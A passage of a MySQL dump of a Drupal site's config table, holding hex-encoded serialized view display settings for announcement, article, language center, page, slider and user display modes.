226e6f64652e616e6e6f756e63656d656e742e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a353a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a31323a22746578745f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a333b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a32343a226669656c645f616e6e6f756e63655f706f73745f64617465223b613a363a7b733a343a2274797065223b733a31363a226461746574696d655f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a323a7b733a31373a2274696d657a6f6e655f6f76657272696465223b733a303a22223b733a31313a22666f726d61745f74797065223b733a363a226d656469756d223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31373a226669656c645f6465736372697074696f6e223b613a363a7b733a343a2274797065223b733a31323a22746578745f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31393a226669656c645f646f776e6c6f61645f66696c65223b613a363a7b733a343a2274797065223b733a31323a2266696c655f64656661756c74223b733a353a226c6162656c223b733a353a2261626f7665223b733a383a2273657474696e6773223b613a313a7b733a32383a227573655f6465736372697074696f6e5f61735f6c696e6b5f74657874223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a343b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a343a7b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a313a7b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.announcement.teaser', 0x613a31303a7b733a343a2275756964223b733a33363a2264663462636464622d363333382d346635352d626135312d376139336566383531313261223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a363a7b693a303b733a33333a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e746561736572223b693a313b733a33343a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e626f6479223b693a323b733a35343a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f616e6e6f756e63655f706f73745f64617465223b693a333b733a34373a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f6465736372697074696f6e223b693a343b733a34393a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f646f776e6c6f61645f66696c65223b693a353b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a343a2274657874223b693a313b733a343a2275736572223b7d7d733a323a226964223b733a32343a226e6f64652e616e6e6f756e63656d656e742e746561736572223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a343a226d6f6465223b733a363a22746561736572223b733a373a22636f6e74656e74223b613a323a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a32333a22746578745f73756d6d6172795f6f725f7472696d6d6564223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a313a7b733a31313a227472696d5f6c656e677468223b693a3630303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a343a7b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a343a7b733a32343a226669656c645f616e6e6f756e63655f706f73745f64617465223b623a313b733a31373a226669656c645f6465736372697074696f6e223b623a313b733a31393a226669656c645f646f776e6c6f61645f66696c65223b623a313b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.article.default', 0x613a31313a7b733a343a2275756964223b733a33363a2230646661353363622d333037372d343362302d393033652d643335323939383337623064223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a373a7b693a303b733a34383a22636f72652e656e746974795f766965775f646973706c61792e636f6d6d656e742e636f6d6d656e742e64656661756c74223b693a313b733a32393a226669656c642e6669656c642e6e6f64652e61727469636c652e626f6479223b693a323b733a33323a226669656c642e6669656c642e6e6f64652e61727469636c652e636f6d6d656e74223b693a333b733a33363a226669656c642e6669656c642e6e6f64652e61727469636c652e6669656c645f696d616765223b693a343b733a33353a226669656c642e6669656c642e6e6f64652e61727469636c652e6669656c645f74616773223b693a353b733a31363a22696d6167652e7374796c652e77696465223b693a363b733a31373a226e6f64652e747970652e61727469636c65223b7d733a363a226d6f64756c65223b613a343a7b693a303b733a373a22636f6d6d656e74223b693a313b733a353a22696d616765223b693a323b733a343a2274657874223b693a333b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22376662306a39486e49586650396e6465777a6750507a7a65585f5356353332777559706b736372434d436b223b7d733a323a226964223b733a32303a226e6f64652e61727469636c652e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a353a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a31323a22746578745f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a373a22636f6d6d656e74223b613a363a7b733a343a2274797065223b733a31353a22636f6d6d656e745f64656661756c74223b733a353a226c6162656c223b733a353a2261626f7665223b733a383a2273657474696e6773223b613a323a7b733a393a22766965775f6d6f6465223b733a373a2264656661756c74223b733a383a2270616765725f6964223b693a303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3131303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31313a226669656c645f696d616765223b613a363a7b733a343a2274797065223b733a353a22696d616765223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a333a7b733a31303a22696d6167655f6c696e6b223b733a303a22223b733a31313a22696d6167655f7374796c65223b733a343a2277696465223b733a31333a22696d6167655f6c6f6164696e67223b613a313a7b733a393a22617474726962757465223b733a343a226c617a79223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a2d313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31303a226669656c645f74616773223b613a363a7b733a343a2274797065223b733a32323a22656e746974795f7265666572656e63655f6c6162656c223b733a353a226c6162656c223b733a353a2261626f7665223b733a383a2273657474696e6773223b613a313a7b733a343a226c696e6b223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a343a7b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a313a7b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.article.rss', 0x613a31313a7b733a343a2275756964223b733a33363a2239366366366134362d636664302d346663372d393333392d303535323263613037396165223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a363a7b693a303b733a33303a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e727373223b693a313b733a32393a226669656c642e6669656c642e6e6f64652e61727469636c652e626f6479223b693a323b733a33323a226669656c642e6669656c642e6e6f64652e61727469636c652e636f6d6d656e74223b693a333b733a33363a226669656c642e6669656c642e6e6f64652e61727469636c652e6669656c645f696d616765223b693a343b733a33353a226669656c642e6669656c642e6e6f64652e61727469636c652e6669656c645f74616773223b693a353b733a31373a226e6f64652e747970652e61727469636c65223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2232724972364b3551305551396b6867307a455f434b2d50744a483736554c2d4244445a635a6e5a7a774363223b7d733a323a226964223b733a31363a226e6f64652e61727469636c652e727373223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a343a226d6f6465223b733a333a22727373223b733a373a22636f6e74656e74223b613a313a7b733a353a226c696e6b73223b613a323a7b733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a353a7b733a343a22626f6479223b623a313b733a373a22636f6d6d656e74223b623a313b733a31313a226669656c645f696d616765223b623a313b733a31303a226669656c645f74616773223b623a313b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.article.teaser', 0x613a31313a7b733a343a2275756964223b733a33363a2264643561623831632d303235302d343163642d386431352d666263396330666335663636223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a373a7b693a303b733a33333a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e746561736572223b693a313b733a32393a226669656c642e6669656c642e6e6f64652e61727469636c652e626f6479223b693a323b733a33323a226669656c642e6669656c642e6e6f64652e61727469636c652e636f6d6d656e74223b693a333b733a33363a226669656c642e6669656c642e6e6f64652e61727469636c652e6669656c645f696d616765223b693a343b733a33353a226669656c642e6669656c642e6e6f64652e61727469636c652e6669656c645f74616773223b693a353b733a31383a22696d6167652e7374796c652e6d656469756d223b693a363b733a31373a226e6f64652e747970652e61727469636c65223b7d733a363a226d6f64756c65223b613a333a7b693a303b733a353a22696d616765223b693a313b733a343a2274657874223b693a323b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2238336a583543684147644d7a4f786944415f42314e6a676562564d7544386c4e564467436c675f51565038223b7d733a323a226964223b733a31393a226e6f64652e61727469636c652e746561736572223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a343a226d6f6465223b733a363a22746561736572223b733a373a22636f6e74656e74223b613a343a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a32333a22746578745f73756d6d6172795f6f725f7472696d6d6564223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a313a7b733a31313a227472696d5f6c656e677468223b693a3630303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31313a226669656c645f696d616765223b613a363a7b733a343a2274797065223b733a353a22696d616765223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a333a7b733a31303a22696d6167655f6c696e6b223b733a373a22636f6e74656e74223b733a31313a22696d6167655f7374796c65223b733a363a226d656469756d223b733a31333a22696d6167655f6c6f6164696e67223b613a313a7b733a393a22617474726962757465223b733a343a226c617a79223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a2d313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31303a226669656c645f74616773223b613a363a7b733a343a2274797065223b733a32323a22656e746974795f7265666572656e63655f6c6162656c223b733a353a226c6162656c223b733a353a2261626f7665223b733a383a2273657474696e6773223b613a313a7b733a343a226c696e6b223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a323a7b733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a343a7b733a373a22636f6d6d656e74223b623a313b733a31313a226669656c645f696d616765223b623a313b733a31303a226669656c645f74616773223b623a313b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.language_center.default', 0x613a31303a7b733a343a2275756964223b733a33363a2262653463316564652d306237392d343364332d396134612d626433626238613231366364223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a363a7b693a303b733a33373a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e626f6479223b693a313b733a35373a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f6465736372697074696f6e223b693a323b733a35393a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f646f776e6c6f61645f66696c65223b693a333b733a34393a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f696d67223b693a343b733a35353a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f706f73745f64617465223b693a353b733a32353a226e6f64652e747970652e6c616e67756167655f63656e746572223b7d733a363a226d6f64756c65223b613a353a7b693a303b733a383a226461746574696d65223b693a313b733a343a2266696c65223b693a323b733a353a22696d616765223b693a333b733a343a2274657874223b693a343b733a343a2275736572223b7d7d733a323a226964223b733a32383a226e6f64652e6c616e67756167655f63656e7465722e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31353a226c616e67756167655f63656e746572223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a363a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a31323a22746578745f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a32343a226669656c645f63656e7465725f6465736372697074696f6e223b613a363a7b733a343a2274797065223b733a31323a22746578745f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a343b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a32363a226669656c645f63656e7465725f646f776e6c6f61645f66696c65223b613a363a7b733a343a2274797065223b733a31323a2266696c655f64656661756c74223b733a353a226c6162656c223b733a353a2261626f7665223b733a383a2273657474696e6773223b613a313a7b733a32383a227573655f6465736372697074696f6e5f61735f6c696e6b5f74657874223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a353b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31363a226669656c645f63656e7465725f696d67223b613a363a7b733a343a2274797065223b733a353a22696d616765223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a333a7b733a31303a22696d6167655f6c696e6b223b733a303a22223b733a31313a22696d6167655f7374796c65223b733a303a22223b733a31333a22696d6167655f6c6f6164696e67223b613a313a7b733a393a22617474726962757465223b733a343a226c617a79223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a333b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a32323a226669656c645f63656e7465725f706f73745f64617465223b613a363a7b733a343a2274797065223b733a31363a226461746574696d655f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a323a7b733a31373a2274696d657a6f6e655f6f76657272696465223b733a303a22223b733a31313a22666f726d61745f74797065223b733a363a226d656469756d223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a343a7b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a313a7b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.language_center.teaser', 0x613a31303a7b733a343a2275756964223b733a33363a2231313231383938302d343064332d343130362d383265622d643130653434643061656233223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a373a7b693a303b733a33333a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e746561736572223b693a313b733a33373a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e626f6479223b693a323b733a35373a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f6465736372697074696f6e223b693a333b733a35393a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f646f776e6c6f61645f66696c65223b693a343b733a34393a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f696d67223b693a353b733a35353a226669656c642e6669656c642e6e6f64652e6c616e67756167655f63656e7465722e6669656c645f63656e7465725f706f73745f64617465223b693a363b733a32353a226e6f64652e747970652e6c616e67756167655f63656e746572223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a343a2274657874223b693a313b733a343a2275736572223b7d7d733a323a226964223b733a32373a226e6f64652e6c616e67756167655f63656e7465722e746561736572223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31353a226c616e67756167655f63656e746572223b733a343a226d6f6465223b733a363a22746561736572223b733a373a22636f6e74656e74223b613a323a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a32333a22746578745f73756d6d6172795f6f725f7472696d6d6564223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a313a7b733a31313a227472696d5f6c656e677468223b693a3630303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a343a7b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a353a7b733a32343a226669656c645f63656e7465725f6465736372697074696f6e223b623a313b733a32363a226669656c645f63656e7465725f646f776e6c6f61645f66696c65223b623a313b733a31363a226669656c645f63656e7465725f696d67223b623a313b733a32323a226669656c645f63656e7465725f706f73745f64617465223b623a313b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.page.default', 0x613a31313a7b733a343a2275756964223b733a33363a2262356237366637632d333733612d343162392d383639322d366362666438653338356238223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a32363a226669656c642e6669656c642e6e6f64652e706167652e626f6479223b693a313b733a31343a226e6f64652e747970652e70616765223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a343a2274657874223b693a313b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224d5f59384c3574666d687837445231343345303559795a53707667696c365646767163664257796b616c67223b7d733a323a226964223b733a31373a226e6f64652e706167652e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a343a2270616765223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a323a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a31323a22746578745f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a323a7b733a363a22776569676874223b693a3130313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a313a7b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.page.teaser', 0x613a31313a7b733a343a2275756964223b733a33363a2265306331383233632d613537392d343364352d623861662d323533643335316639316532223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a333a7b693a303b733a33333a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e746561736572223b693a313b733a32363a226669656c642e6669656c642e6e6f64652e706167652e626f6479223b693a323b733a31343a226e6f64652e747970652e70616765223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a343a2274657874223b693a313b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a223842676452744c62745130465f5f6f3046485348304d78356676584f72613974665431476d4e4b62525977223b7d733a323a226964223b733a31363a226e6f64652e706167652e746561736572223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a343a2270616765223b733a343a226d6f6465223b733a363a22746561736572223b733a373a22636f6e74656e74223b613a323a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a32333a22746578745f73756d6d6172795f6f725f7472696d6d6564223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a313a7b733a31313a227472696d5f6c656e677468223b693a3630303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a323a7b733a363a22776569676874223b693a3130313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a313a7b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.slider.default', 0x613a31303a7b733a343a2275756964223b733a33363a2262346233313633362d323730372d343031642d396434342d373937336633323462376461223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a333a7b693a303b733a32383a226669656c642e6669656c642e6e6f64652e736c696465722e626f6479223b693a313b733a34303a226669656c642e6669656c642e6e6f64652e736c696465722e6669656c645f736c696465725f696d67223b693a323b733a31363a226e6f64652e747970652e736c69646572223b7d733a363a226d6f64756c65223b613a333a7b693a303b733a353a22696d616765223b693a313b733a343a2274657874223b693a323b733a343a2275736572223b7d7d733a323a226964223b733a31393a226e6f64652e736c696465722e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a363a22736c69646572223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a333a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a31323a22746578745f64656661756c74223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a31363a226669656c645f736c696465725f696d67223b613a363a7b733a343a2274797065223b733a353a22696d616765223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a333a7b733a31303a22696d6167655f6c696e6b223b733a303a22223b733a31313a22696d6167655f7374796c65223b733a303a22223b733a31333a22696d6167655f6c6f6164696e67223b613a313a7b733a393a22617474726962757465223b733a343a226c617a79223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a343a7b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a313a7b733a383a226c616e67636f6465223b623a313b7d7d),
('', 'core.entity_view_display.node.slider.teaser', 0x613a31303a7b733a343a2275756964223b733a33363a2230646139326332302d316431632d343366382d383130662d333837386663363461306461223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a343a7b693a303b733a33333a22636f72652e656e746974795f766965775f6d6f64652e6e6f64652e746561736572223b693a313b733a32383a226669656c642e6669656c642e6e6f64652e736c696465722e626f6479223b693a323b733a34303a226669656c642e6669656c642e6e6f64652e736c696465722e6669656c645f736c696465725f696d67223b693a333b733a31363a226e6f64652e747970652e736c69646572223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a343a2274657874223b693a313b733a343a2275736572223b7d7d733a323a226964223b733a31383a226e6f64652e736c696465722e746561736572223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a363a22736c69646572223b733a343a226d6f6465223b733a363a22746561736572223b733a373a22636f6e74656e74223b613a323a7b733a343a22626f6479223b613a363a7b733a343a2274797065223b733a32333a22746578745f73756d6d6172795f6f725f7472696d6d6564223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a313a7b733a31313a227472696d5f6c656e677468223b693a3630303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d733a353a226c696e6b73223b613a343a7b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a323a7b733a31363a226669656c645f736c696465725f696d67223b623a313b733a383a226c616e67636f6465223b623a313b7d7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'core.entity_view_display.user.user.compact', 0x613a31313a7b733a343a2275756964223b733a33363a2262653563646339302d323237352d343638362d626665302d623138303336626636353931223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a333a7b693a303b733a33343a22636f72652e656e746974795f766965775f6d6f64652e757365722e636f6d70616374223b693a313b733a33343a226669656c642e6669656c642e757365722e757365722e757365725f70696374757265223b693a323b733a32313a22696d6167652e7374796c652e7468756d626e61696c223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a353a22696d616765223b693a313b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2230307a725f524264546a506a424749544433683463314553515a696d6a645643634847743174724c714959223b7d733a323a226964223b733a31373a22757365722e757365722e636f6d70616374223b733a31363a22746172676574456e7469747954797065223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b733a343a226d6f6465223b733a373a22636f6d70616374223b733a373a22636f6e74656e74223b613a313a7b733a31323a22757365725f70696374757265223b613a363a7b733a343a2274797065223b733a353a22696d616765223b733a353a226c6162656c223b733a363a2268696464656e223b733a383a2273657474696e6773223b613a333a7b733a31303a22696d6167655f6c696e6b223b733a373a22636f6e74656e74223b733a31313a22696d6167655f7374796c65223b733a393a227468756d626e61696c223b733a31333a22696d6167655f6c6f6164696e67223b613a313a7b733a393a22617474726962757465223b733a343a226c617a79223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b7d7d733a363a2268696464656e223b613a323a7b733a383a226c616e67636f6465223b623a313b733a31303a226d656d6265725f666f72223b623a313b7d7d),
('', 'core.entity_view_display.user.user.default', 